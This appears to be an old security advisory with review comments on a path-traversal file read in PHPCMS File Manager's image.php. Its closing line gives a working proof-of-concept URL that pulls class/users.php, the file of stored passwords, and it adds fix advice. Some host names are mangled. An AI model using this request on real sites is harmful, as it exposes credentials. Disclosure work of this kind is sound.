# #Author : HeXie S3curity TeAm #Date : 2011.10.01 #
#FIle : /image.php <?php /* *######################################### * PHPCMS File Manager * Copyright (c) 2004-2006 phpcms.cn * Author: Longbill ( HdhCmsTestlongbill.cn ) * longbill.cn@gmail测试数据 HdhCmsTest2cto测试数据 *######################################### */
// image.php entry script as quoted by the advisory: takes a file path and a "max" value
// from the query string, answers conditional requests with a fixed ETag, and hands
// the path to err() when "max" is missing.
// NOTE(review): $path is attacker-controlled and is never confined to an image directory.
// The hardening a maintainer would want here: resolve it with realpath(), require the
// result to sit inside the images directory, and accept only image extensions.
$path = $_GET["path"]; // Read the path information from the query string.
// NOTE(review): the unquoted key HTTP_REFERER relies on PHP's legacy bare-word-to-string
// fallback; PHP 8 raises an Error for an undefined constant instead.
$from = $_SERVER[HTTP_REFERER];
$from = dirname($from).'/';
// When the Referer yields a directory prefix, remove that prefix from $path.
// This is string cleanup only; it does not limit which file $path can name.
if ($from != '/' ) $path = str_replace($from,"",$path);
$max = $_GET["max"];
include_once("func.php");
// The ETag is one constant for every response of this script, whatever $path is.
$etag = "qqqq";
if ($_SERVER['HTTP_IF_NONE_MATCH'] == $etag)
{
    // Client already holds this ETag: reply 304 and stop.
    header('Etag:'.$etag,true,304);
    exit;
}
else header('Etag:'.$etag);
header('Last-Modified:Tue,01 Aug 1999 10:26:24 GMT');
// Image not found: fall back to the placeholder image.
// file_exists() is the only check on $path, and it is true for any existing file, not only images.
if (!$path || !file_exists($path)) $path="images/notfound.gif";
// {Advisory note: the max variable is passed via GET; when $max is empty or falsy, err() is called.}
if (!$max) err();
// Advisory text: let's look at how the err() function is written.
// File: /image.php
/**
 * Send the file named by the global $path to the client and stop the script.
 *
 * Emits a Content-Length header taken from filesize($path) (warnings suppressed
 * with @), streams the file with readfile(), then terminates with die.
 *
 * NOTE(review): $path is the global that image.php fills from $_GET["path"]; the only
 * check made before this call is file_exists(). Nothing restricts the file's location
 * or type, so this function returns whatever file the request names. A fix belongs
 * before readfile(): resolve the path with realpath(), require it to be inside the
 * images directory, and allow only image extensions; otherwise serve the placeholder.
 */
function err()
{
    global $path;
    header("Content-Length: " .@filesize($path ));
    readfile($path); // Read $path and write its contents to the response.
    die;
}
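PoC: http://hkmjj测试数据/cms/image.php?path=class/users.php // 读取密码文件, 前台登陆. 请求中没有 max 参数, 所以 image.php 会调用 err(), 把 path 指向的文件原样输出. 如果没有显示, 请右键以「查看源码」的形式打开. 修复建议: 在 readfile() 之前用 realpath() 解析 path, 只允许位于图片目录内且扩展名为图片类型的文件, 其余请求一律返回 images/notfound.gif. end.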